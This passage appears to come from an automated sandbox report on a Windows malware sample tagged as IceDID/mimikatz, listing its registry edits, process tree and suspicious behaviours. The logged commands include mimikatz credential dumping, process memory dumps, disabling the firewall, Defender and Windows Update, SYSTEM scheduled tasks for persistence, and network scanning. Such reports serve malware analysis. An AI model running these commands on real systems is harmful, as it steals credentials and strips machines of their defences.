value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ligfuakbd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ligfuakbd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ligfuakbd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ligfuakbd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ligfuakbd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ligfuakbd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ligfuakbd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ligfuakbd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ligfuakbd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ligfuakbd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" kbejuig.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ligfuakbd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ligfuakbd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ligfuakbd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ligfuakbd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ligfuakbd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ligfuakbd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ligfuakbd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ligfuakbd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ligfuakbd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing ligfuakbd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals ligfuakbd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ligfuakbd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ligfuakbd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ligfuakbd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ligfuakbd.exe -
Modifies registry class 14 IoCs
Processes:
kbejuig.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ kbejuig.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ kbejuig.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" kbejuig.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" kbejuig.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ kbejuig.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" kbejuig.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" kbejuig.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ kbejuig.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" kbejuig.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ kbejuig.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" kbejuig.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ kbejuig.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" kbejuig.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ kbejuig.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
kbejuig.exepid process 1612 kbejuig.exe 1612 kbejuig.exe 1612 kbejuig.exe 1612 kbejuig.exe 1612 kbejuig.exe 1612 kbejuig.exe 1612 kbejuig.exe 1612 kbejuig.exe 1612 kbejuig.exe 1612 kbejuig.exe 1612 kbejuig.exe 1612 kbejuig.exe 1612 kbejuig.exe 1612 kbejuig.exe 1612 kbejuig.exe 1612 kbejuig.exe 1612 kbejuig.exe 1612 kbejuig.exe 1612 kbejuig.exe 1612 kbejuig.exe 1612 kbejuig.exe 1612 kbejuig.exe 1612 kbejuig.exe 1612 kbejuig.exe 1612 kbejuig.exe 1612 kbejuig.exe 1612 kbejuig.exe 1612 kbejuig.exe 1612 kbejuig.exe 1612 kbejuig.exe 1612 kbejuig.exe 1612 kbejuig.exe 1612 kbejuig.exe 1612 kbejuig.exe 1612 kbejuig.exe 1612 kbejuig.exe 1612 kbejuig.exe 1612 kbejuig.exe 1612 kbejuig.exe 1612 kbejuig.exe 1612 kbejuig.exe 1612 kbejuig.exe 1612 kbejuig.exe 1612 kbejuig.exe 1612 kbejuig.exe 1612 kbejuig.exe 1612 kbejuig.exe 1612 kbejuig.exe 1612 kbejuig.exe 1612 kbejuig.exe 1612 kbejuig.exe 1612 kbejuig.exe 1612 kbejuig.exe 1612 kbejuig.exe 1612 kbejuig.exe 1612 kbejuig.exe 1612 kbejuig.exe 1612 kbejuig.exe 1612 kbejuig.exe 1612 kbejuig.exe 1612 kbejuig.exe 1612 kbejuig.exe 1612 kbejuig.exe 1612 kbejuig.exe -
Suspicious behavior: LoadsDriver 15 IoCs
Processes:
pid process 664 664 664 664 664 664 664 664 664 664 664 664 664 664 664 -
Suspicious behavior: RenamesItself 1 IoCs
Processes:
2024-04-09_f44f00bd6fdabcab90742047cca0ba6a_hacktools_icedid_mimikatz.exepid process 800 2024-04-09_f44f00bd6fdabcab90742047cca0ba6a_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 22 IoCs
Processes:
2024-04-09_f44f00bd6fdabcab90742047cca0ba6a_hacktools_icedid_mimikatz.exekbejuig.exekbejuig.exevfshost.exeligfuakbd.exekayllc.exeligfuakbd.exeligfuakbd.exeligfuakbd.exeligfuakbd.exeligfuakbd.exeligfuakbd.exeligfuakbd.exeligfuakbd.exeligfuakbd.exeligfuakbd.exeligfuakbd.exeligfuakbd.exeligfuakbd.exeligfuakbd.exeligfuakbd.exedescription pid process Token: SeDebugPrivilege 800 2024-04-09_f44f00bd6fdabcab90742047cca0ba6a_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 1688 kbejuig.exe Token: SeDebugPrivilege 1612 kbejuig.exe Token: SeDebugPrivilege 1144 vfshost.exe Token: SeDebugPrivilege 432 ligfuakbd.exe Token: SeLockMemoryPrivilege 3260 kayllc.exe Token: SeLockMemoryPrivilege 3260 kayllc.exe Token: SeDebugPrivilege 4392 ligfuakbd.exe Token: SeDebugPrivilege 2960 ligfuakbd.exe Token: SeDebugPrivilege 4608 ligfuakbd.exe Token: SeDebugPrivilege 3324 ligfuakbd.exe Token: SeDebugPrivilege 3760 ligfuakbd.exe Token: SeDebugPrivilege 372 ligfuakbd.exe Token: SeDebugPrivilege 4072 ligfuakbd.exe Token: SeDebugPrivilege 4948 ligfuakbd.exe Token: SeDebugPrivilege 4856 ligfuakbd.exe Token: SeDebugPrivilege 1100 ligfuakbd.exe Token: SeDebugPrivilege 2600 ligfuakbd.exe Token: SeDebugPrivilege 1604 ligfuakbd.exe Token: SeDebugPrivilege 2412 ligfuakbd.exe Token: SeDebugPrivilege 4540 ligfuakbd.exe Token: SeDebugPrivilege 1144 ligfuakbd.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
2024-04-09_f44f00bd6fdabcab90742047cca0ba6a_hacktools_icedid_mimikatz.exekbejuig.exekbejuig.exexohudmc.exeogiqci.exekbejuig.exekbejuig.exepid process 800 2024-04-09_f44f00bd6fdabcab90742047cca0ba6a_hacktools_icedid_mimikatz.exe 800 2024-04-09_f44f00bd6fdabcab90742047cca0ba6a_hacktools_icedid_mimikatz.exe 1688 kbejuig.exe 1688 kbejuig.exe 1612 kbejuig.exe 1612 kbejuig.exe 4360 xohudmc.exe 1624 ogiqci.exe 4420 kbejuig.exe 4420 kbejuig.exe 5328 kbejuig.exe 5328 kbejuig.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
2024-04-09_f44f00bd6fdabcab90742047cca0ba6a_hacktools_icedid_mimikatz.execmd.exekbejuig.execmd.execmd.exewpcap.exenet.exenet.exenet.exedescription pid process target process PID 800 wrote to memory of 2084 800 2024-04-09_f44f00bd6fdabcab90742047cca0ba6a_hacktools_icedid_mimikatz.exe cmd.exe PID 800 wrote to memory of 2084 800 2024-04-09_f44f00bd6fdabcab90742047cca0ba6a_hacktools_icedid_mimikatz.exe cmd.exe PID 800 wrote to memory of 2084 800 2024-04-09_f44f00bd6fdabcab90742047cca0ba6a_hacktools_icedid_mimikatz.exe cmd.exe PID 2084 wrote to memory of 4332 2084 cmd.exe PING.EXE PID 2084 wrote to memory of 4332 2084 cmd.exe PING.EXE PID 2084 wrote to memory of 4332 2084 cmd.exe PING.EXE PID 2084 wrote to memory of 1688 2084 cmd.exe kbejuig.exe PID 2084 wrote to memory of 1688 2084 cmd.exe kbejuig.exe PID 2084 wrote to memory of 1688 2084 cmd.exe kbejuig.exe PID 1612 wrote to memory of 4392 1612 kbejuig.exe cmd.exe PID 1612 wrote to memory of 4392 1612 kbejuig.exe cmd.exe PID 1612 wrote to memory of 4392 1612 kbejuig.exe cmd.exe PID 4392 wrote to memory of 456 4392 cmd.exe cmd.exe PID 4392 wrote to memory of 456 4392 cmd.exe cmd.exe PID 4392 wrote to memory of 456 4392 cmd.exe cmd.exe PID 4392 wrote to memory of 3000 4392 cmd.exe cacls.exe PID 4392 wrote to memory of 3000 4392 cmd.exe cacls.exe PID 4392 wrote to memory of 3000 4392 cmd.exe cacls.exe PID 4392 wrote to memory of 4892 4392 cmd.exe cmd.exe PID 4392 wrote to memory of 4892 4392 cmd.exe cmd.exe PID 4392 wrote to memory of 4892 4392 cmd.exe cmd.exe PID 4392 wrote to memory of 4320 4392 cmd.exe cacls.exe PID 4392 wrote to memory of 4320 4392 cmd.exe cacls.exe PID 4392 wrote to memory of 4320 4392 cmd.exe cacls.exe PID 4392 wrote to memory of 3184 4392 cmd.exe cmd.exe PID 4392 wrote to memory of 3184 4392 cmd.exe cmd.exe PID 4392 wrote to memory of 3184 4392 cmd.exe cmd.exe PID 1612 wrote to memory of 1968 1612 kbejuig.exe netsh.exe PID 1612 wrote to memory of 1968 1612 kbejuig.exe netsh.exe PID 1612 wrote to memory of 1968 1612 kbejuig.exe netsh.exe PID 4392 wrote to memory of 4932 4392 cmd.exe cacls.exe PID 4392 wrote to memory of 4932 4392 cmd.exe cacls.exe PID 4392 wrote to memory of 4932 4392 cmd.exe cacls.exe PID 1612 wrote to memory of 3796 1612 kbejuig.exe netsh.exe PID 1612 wrote to memory of 3796 1612 kbejuig.exe netsh.exe PID 1612 wrote to memory of 3796 1612 kbejuig.exe netsh.exe PID 1612 wrote to memory of 4368 1612 kbejuig.exe netsh.exe PID 1612 wrote to memory of 4368 1612 kbejuig.exe netsh.exe PID 1612 wrote to memory of 4368 1612 kbejuig.exe netsh.exe PID 1612 wrote to memory of 396 1612 kbejuig.exe cmd.exe PID 1612 wrote to memory of 396 1612 kbejuig.exe cmd.exe PID 1612 wrote to memory of 396 1612 kbejuig.exe cmd.exe PID 396 wrote to memory of 644 396 cmd.exe wpcap.exe PID 396 wrote to memory of 644 396 cmd.exe wpcap.exe PID 396 wrote to memory of 644 396 cmd.exe wpcap.exe PID 644 wrote to memory of 3876 644 wpcap.exe net.exe PID 644 wrote to memory of 3876 644 wpcap.exe net.exe PID 644 wrote to memory of 3876 644 wpcap.exe net.exe PID 3876 wrote to memory of 4436 3876 net.exe net1.exe PID 3876 wrote to memory of 4436 3876 net.exe net1.exe PID 3876 wrote to memory of 4436 3876 net.exe net1.exe PID 644 wrote to memory of 184 644 wpcap.exe net.exe PID 644 wrote to memory of 184 644 wpcap.exe net.exe PID 644 wrote to memory of 184 644 wpcap.exe net.exe PID 184 wrote to memory of 4240 184 net.exe net1.exe PID 184 wrote to memory of 4240 184 net.exe net1.exe PID 184 wrote to memory of 4240 184 net.exe net1.exe PID 644 wrote to memory of 4220 644 wpcap.exe net.exe PID 644 wrote to memory of 4220 644 wpcap.exe net.exe PID 644 wrote to memory of 4220 644 wpcap.exe net.exe PID 4220 wrote to memory of 3684 4220 net.exe net1.exe PID 4220 wrote to memory of 3684 4220 net.exe net1.exe PID 4220 wrote to memory of 3684 4220 net.exe net1.exe PID 644 wrote to memory of 3232 644 wpcap.exe net.exe
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2132
-
C:\Windows\TEMP\ycubiyfde\kayllc.exe"C:\Windows\TEMP\ycubiyfde\kayllc.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3260
-
C:\Users\Admin\AppData\Local\Temp\2024-04-09_f44f00bd6fdabcab90742047cca0ba6a_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-04-09_f44f00bd6fdabcab90742047cca0ba6a_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:800 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\mitbajei\kbejuig.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2084 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:4332 -
C:\Windows\mitbajei\kbejuig.exeC:\Windows\mitbajei\kbejuig.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1688
-
C:\Windows\mitbajei\kbejuig.exeC:\Windows\mitbajei\kbejuig.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Sets file execution options in registry
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1612 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
PID:4392 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:456
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:3000
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4892
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:4320
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3184
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:4932
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵PID:1968
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵PID:3796
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵PID:4368
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\mfckutrue\tbejirgpe\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
PID:396 -
C:\Windows\mfckutrue\tbejirgpe\wpcap.exeC:\Windows\mfckutrue\tbejirgpe\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:644 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:3876 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵PID:4436
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:184 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵PID:4240
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
PID:4220 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵PID:3684
-
C:\Windows\SysWOW64\net.exenet start npf4⤵PID:3232
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵PID:1972
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:636
-
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:3932
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:4568
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:1624
-
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:3640
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:3736
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\mfckutrue\tbejirgpe\crtyfytge.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\mfckutrue\tbejirgpe\Scant.txt2⤵PID:3184
-
C:\Windows\mfckutrue\tbejirgpe\crtyfytge.exeC:\Windows\mfckutrue\tbejirgpe\crtyfytge.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\mfckutrue\tbejirgpe\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1712 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\mfckutrue\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\mfckutrue\Corporate\log.txt2⤵
- Drops file in Windows directory
PID:1884 -
C:\Windows\mfckutrue\Corporate\vfshost.exeC:\Windows\mfckutrue\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1144 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "ugtpugmje" /ru system /tr "cmd /c C:\Windows\ime\kbejuig.exe"2⤵PID:2392
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4708
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "ugtpugmje" /ru system /tr "cmd /c C:\Windows\ime\kbejuig.exe"3⤵
- Creates scheduled task(s)
PID:5044 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "bpgzmejug" /ru system /tr "cmd /c echo Y|cacls C:\Windows\mitbajei\kbejuig.exe /p everyone:F"2⤵PID:4916
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3060
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "bpgzmejug" /ru system /tr "cmd /c echo Y|cacls C:\Windows\mitbajei\kbejuig.exe /p everyone:F"3⤵
- Creates scheduled task(s)
PID:912 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "qbcryqppe" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ycubiyfde\kayllc.exe /p everyone:F"2⤵PID:1276
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3252
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "qbcryqppe" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ycubiyfde\kayllc.exe /p everyone:F"3⤵
- Creates scheduled task(s)
PID:2092 -
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵PID:2176
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵PID:4288
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:4680
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:4248
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵PID:632
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵PID:2600
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:5104
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:1464
-
C:\Windows\TEMP\mfckutrue\ligfuakbd.exeC:\Windows\TEMP\mfckutrue\ligfuakbd.exe -accepteula -mp 776 C:\Windows\TEMP\mfckutrue\776.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:432 -
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵PID:1752
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵PID:1712
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:4608
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:3324
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵PID:804
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵PID:4464
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵PID:912
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵PID:1824
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
PID:1984 -
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵PID:4296
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
PID:1276 -
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵PID:4756
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵PID:1448
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵PID:4188
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵PID:4000
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵PID:3412
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵PID:4436
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵PID:4580
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵PID:1972
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵PID:2304
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵PID:3312
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
PID:2052 -
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵PID:868
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
PID:644 -
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵PID:3912
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
PID:4036 -
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵PID:3452
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
PID:4128 -
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
PID:4360 -
C:\Windows\TEMP\mfckutrue\ligfuakbd.exeC:\Windows\TEMP\mfckutrue\ligfuakbd.exe -accepteula -mp 1012 C:\Windows\TEMP\mfckutrue\1012.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4392 -
C:\Windows\TEMP\mfckutrue\ligfuakbd.exeC:\Windows\TEMP\mfckutrue\ligfuakbd.exe -accepteula -mp 2132 C:\Windows\TEMP\mfckutrue\2132.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2960 -
C:\Windows\TEMP\mfckutrue\ligfuakbd.exeC:\Windows\TEMP\mfckutrue\ligfuakbd.exe -accepteula -mp 2628 C:\Windows\TEMP\mfckutrue\2628.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4608 -
C:\Windows\TEMP\mfckutrue\ligfuakbd.exeC:\Windows\TEMP\mfckutrue\ligfuakbd.exe -accepteula -mp 2816 C:\Windows\TEMP\mfckutrue\2816.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3324 -
C:\Windows\TEMP\mfckutrue\ligfuakbd.exeC:\Windows\TEMP\mfckutrue\ligfuakbd.exe -accepteula -mp 2880 C:\Windows\TEMP\mfckutrue\2880.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3760 -
C:\Windows\TEMP\mfckutrue\ligfuakbd.exeC:\Windows\TEMP\mfckutrue\ligfuakbd.exe -accepteula -mp 3140 C:\Windows\TEMP\mfckutrue\3140.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:372 -
C:\Windows\TEMP\mfckutrue\ligfuakbd.exeC:\Windows\TEMP\mfckutrue\ligfuakbd.exe -accepteula -mp 3856 C:\Windows\TEMP\mfckutrue\3856.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4072 -
C:\Windows\TEMP\mfckutrue\ligfuakbd.exeC:\Windows\TEMP\mfckutrue\ligfuakbd.exe -accepteula -mp 3948 C:\Windows\TEMP\mfckutrue\3948.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4948 -
C:\Windows\TEMP\mfckutrue\ligfuakbd.exeC:\Windows\TEMP\mfckutrue\ligfuakbd.exe -accepteula -mp 4012 C:\Windows\TEMP\mfckutrue\4012.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4856 -
C:\Windows\TEMP\mfckutrue\ligfuakbd.exeC:\Windows\TEMP\mfckutrue\ligfuakbd.exe -accepteula -mp 4092 C:\Windows\TEMP\mfckutrue\4092.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1100 -
C:\Windows\TEMP\mfckutrue\ligfuakbd.exeC:\Windows\TEMP\mfckutrue\ligfuakbd.exe -accepteula -mp 1664 C:\Windows\TEMP\mfckutrue\1664.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2600 -
C:\Windows\TEMP\mfckutrue\ligfuakbd.exeC:\Windows\TEMP\mfckutrue\ligfuakbd.exe -accepteula -mp 536 C:\Windows\TEMP\mfckutrue\536.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1604 -
C:\Windows\TEMP\mfckutrue\ligfuakbd.exeC:\Windows\TEMP\mfckutrue\ligfuakbd.exe -accepteula -mp 4428 C:\Windows\TEMP\mfckutrue\4428.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2412 -
C:\Windows\TEMP\mfckutrue\ligfuakbd.exeC:\Windows\TEMP\mfckutrue\ligfuakbd.exe -accepteula -mp 1912 C:\Windows\TEMP\mfckutrue\1912.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4540 -
